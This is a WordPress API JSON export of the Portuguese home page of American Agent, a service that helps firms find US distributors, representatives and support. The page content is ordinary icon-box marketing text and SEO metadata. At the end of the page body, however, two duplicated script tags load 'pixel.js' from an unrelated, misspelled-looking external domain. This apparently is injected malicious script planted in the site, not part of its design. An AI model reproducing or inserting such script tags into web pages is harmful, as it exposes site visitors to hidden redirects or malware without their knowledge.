{"id":3439,"date":"2013-04-01T15:37:54","date_gmt":"2013-04-01T15:37:54","guid":{"rendered":"https:\/\/americanagent.com\/home-2\/"},"modified":"2014-11-14T08:28:40","modified_gmt":"2014-11-14T13:28:40","slug":"inicio","status":"publish","type":"page","link":"https:\/\/americanagent.com\/pt-br\/","title":{"rendered":"IN\u00cdCIO &#8211; American Agent"},"content":{"rendered":"<div id='layer_slider_1'  class='avia-layerslider main_color avia-shadow  avia-builder-el-0  el_before_av_one_third  avia-builder-el-first  container_wrap sidebar_right'  style='height: 471px;'  ><\/div><div id='after_layer_slider_1'  class='main_color av_default_container_wrap container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-3439'><div class='entry-content-wrapper clearfix'>\n<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-1  el_after_av_layerslider  el_before_av_one_third  avia-builder-el-first  first flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-1e4571e8103eeb7545dc62e2bf8a1724  avia-builder-el-2  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Pesquisar EUA distribuidores, importadores, revendedores e parceiros\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue803' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Pesquisar EUA distribuidores, importadores, revendedores e parceiros<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>N\u00f3s podemos ajud\u00e1 lo a encotrar e a comunicar melhor com os Distribuidores Americanos, importadores, revendedores, Grossistas e parceiros.<\/p>\n<div  class='avia-button-wrap av-av_button-8258aceb0743320cd1a02711c602771f-wrap avia-button-center  avia-builder-el-3  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/pt-br\/distribuidores-americanos\/'  class='avia-button av-av_button-8258aceb0743320cd1a02711c602771f av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-93a81277e5006bb2348109df4de0b554 av_one_third  avia-builder-el-4  el_after_av_one_third  el_before_av_one_third  flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-dad55716379fc9e2bb7d7ce7d2e95113  avia-builder-el-5  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Vendendo diretamente nos EUA\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue881' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Vendendo diretamente nos EUA<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Muitas empresas bem sucedidas est\u00e3o a operar nos EUA, com uma estrat\u00e9gia de vendas muita directa.<\/p>\n<div  class='avia-button-wrap av-av_button-d3c31f6bb968dd6340e20f251f1d51fc-wrap avia-button-center  avia-builder-el-6  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/pt-br\/direct-usa-sales-strategy\/'  class='avia-button av-av_button-d3c31f6bb968dd6340e20f251f1d51fc av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-93a81277e5006bb2348109df4de0b554 av_one_third  avia-builder-el-7  el_after_av_one_third  el_before_av_one_third  flex_column_div  '     ><article  class='iconbox iconbox_top av-av_icon_box-662942d34885ac40962603ed4e063759  avia-builder-el-8  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: PROCURA DE EUA REPRESENTANTE\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue80c' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >PROCURA DE EUA REPRESENTANTE<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Estamos preparados para encontrar os poss\u00edveis melhores Representantes de Vendas Americanos.<\/p>\n<div  class='avia-button-wrap av-av_button-cc5775aefd044dc3bd30b0a461ced33a-wrap avia-button-center  avia-builder-el-9  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/pt-br\/procura-de-eua-representante\/'  class='avia-button av-av_button-cc5775aefd044dc3bd30b0a461ced33a av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-2a9015ff38129c418a3f2eafba3e9512 av_one_third  avia-builder-el-10  el_after_av_one_third  el_before_av_one_third  first flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-f2c7264901b9983cb5d2ed328dc99e8b  avia-builder-el-11  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: EUA SERVI\u00c7OS DE APOIO\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue8c7' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >EUA SERVI\u00c7OS DE APOIO<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p>Fonte de confian\u00e7a para servi\u00e7os Ad-hoc e de terceiros.<\/p>\n<div  class='avia-button-wrap av-av_button-0363a22b88d1a0b79673272e80e60d4a-wrap avia-button-center  avia-builder-el-12  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/pt-br\/eua-servicos-de-apoio\/'  class='avia-button av-av_button-0363a22b88d1a0b79673272e80e60d4a av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div>\n<div  class='flex_column av-av_one_third-93a81277e5006bb2348109df4de0b554 av_one_third  avia-builder-el-13  el_after_av_one_third  el_before_av_one_third  flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-feb1d0f2d16aacb37146a5e75af283d8  avia-builder-el-14  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Guia para entrar no mercado americano\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue84e' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Guia para entrar no mercado americano<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p><span lang=\"PT-BR\" style=\"color: #808080; line-height: 107%; font-family: 'Arial','sans-serif'; font-size: 10pt;\">O objetivo deste guia para entrar no mercado americano \u00e9 ajudar a voc\u00ea e sua empresa a determinar a melhor estrat\u00e9gia e plano de exporta\u00e7\u00e3o para os Estados Unidos.<\/span><\/p>\n<div  class='avia-button-wrap av-av_button-9b8f8eb44761673786188a6d4dcf6e72-wrap avia-button-center  avia-builder-el-15  avia-builder-el-no-sibling '><a href='http:\/\/usamarketguide.com\/pt-br\/produto\/mercado-americano-2\/'  class='avia-button av-av_button-9b8f8eb44761673786188a6d4dcf6e72 av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'  target=\"_blank\"  rel=\"noopener noreferrer\"  aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div><div  class='flex_column av-av_one_third-93a81277e5006bb2348109df4de0b554 av_one_third  avia-builder-el-16  el_after_av_one_third  avia-builder-el-last  flex_column_div  column-top-margin'     ><article  class='iconbox iconbox_top av-av_icon_box-d43af7c2ee1738c711bcad39ddb6ef33  avia-builder-el-17  avia-builder-el-no-sibling  main_color'  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconbox_content\"><header class=\"entry-content-header\" aria-label=\"Icon: Contactos\"><div class='iconbox_icon heading-color avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue805' data-av_iconfont='entypo-fontello'  ><\/div><h3 class='iconbox_content_title '  itemprop=\"headline\" >Contactos<\/h3><\/header><div class='iconbox_content_container '  itemprop=\"text\" ><p><span style=\"color: #666666;\">Estamos preparados para criar uma solu\u00e7\u00e3o personalizada para abordar as suas necessidades de neg\u00f3cio.<\/span><\/p>\n<div  class='avia-button-wrap av-av_button-cd47ce35403981d5701df6ba6a0089db-wrap avia-button-center  avia-builder-el-18  avia-builder-el-no-sibling '><a href='https:\/\/americanagent.com\/pt-br\/contactos\/'  class='avia-button av-av_button-cd47ce35403981d5701df6ba6a0089db av-link-btn avia-icon_select-yes-left-icon avia-size-large avia-position-center avia-color-theme-color'   aria-label=\"See Details\"><span class='avia_button_icon avia_button_icon_left avia-iconfont avia-font-entypo-fontello' data-av_icon='\ue816' data-av_iconfont='entypo-fontello' ><\/span><span class='avia_iconbox_title' >See Details<\/span><\/a><\/div>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>This is a Page excerpt. It will be displayed for search results<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3439","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Pesquisar EUA distribuidores, importadores, revendedores e parceiros<\/title>\n<meta name=\"description\" content=\"N\u00f3s podemos ajud\u00e1 lo a encotrar e a comunicar melhor com os Distribuidores Americanos, importadores, revendedores, Grossistas e parceiros.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/pt-br\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pesquisar EUA distribuidores, importadores, revendedores e parceiros\" \/>\n<meta property=\"og:description\" content=\"N\u00f3s podemos ajud\u00e1 lo a encotrar e a comunicar melhor com os Distribuidores Americanos, importadores, revendedores, Grossistas e parceiros.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/pt-br\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-11-14T13:28:40+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\",\"name\":\"Pesquisar EUA distribuidores, importadores, revendedores e parceiros\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#website\"},\"datePublished\":\"2013-04-01T15:37:54+00:00\",\"dateModified\":\"2014-11-14T13:28:40+00:00\",\"description\":\"N\u00f3s podemos ajud\u00e1 lo a encotrar e a comunicar melhor com os Distribuidores Americanos, importadores, revendedores, Grossistas e parceiros.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"IN\u00cdCIO &#8211; American Agent\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/pt-br\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pesquisar EUA distribuidores, importadores, revendedores e parceiros","description":"N\u00f3s podemos ajud\u00e1 lo a encotrar e a comunicar melhor com os Distribuidores Americanos, importadores, revendedores, Grossistas e parceiros.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/pt-br\/","og_locale":"pt_BR","og_type":"article","og_title":"Pesquisar EUA distribuidores, importadores, revendedores e parceiros","og_description":"N\u00f3s podemos ajud\u00e1 lo a encotrar e a comunicar melhor com os Distribuidores Americanos, importadores, revendedores, Grossistas e parceiros.","og_url":"https:\/\/americanagent.com\/pt-br\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-11-14T13:28:40+00:00","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/pt-br\/","url":"https:\/\/americanagent.com\/pt-br\/","name":"Pesquisar EUA distribuidores, importadores, revendedores e parceiros","isPartOf":{"@id":"https:\/\/americanagent.com\/pt-br\/#website"},"datePublished":"2013-04-01T15:37:54+00:00","dateModified":"2014-11-14T13:28:40+00:00","description":"N\u00f3s podemos ajud\u00e1 lo a encotrar e a comunicar melhor com os Distribuidores Americanos, importadores, revendedores, Grossistas e parceiros.","breadcrumb":{"@id":"https:\/\/americanagent.com\/pt-br\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/pt-br\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/pt-br\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/pt-br\/"},{"@type":"ListItem","position":2,"name":"IN\u00cdCIO &#8211; American Agent"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/pt-br\/#website","url":"https:\/\/americanagent.com\/pt-br\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/pt-br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages\/3439","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/comments?post=3439"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/pages\/3439\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/pt-br\/wp-json\/wp\/v2\/media?parent=3439"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}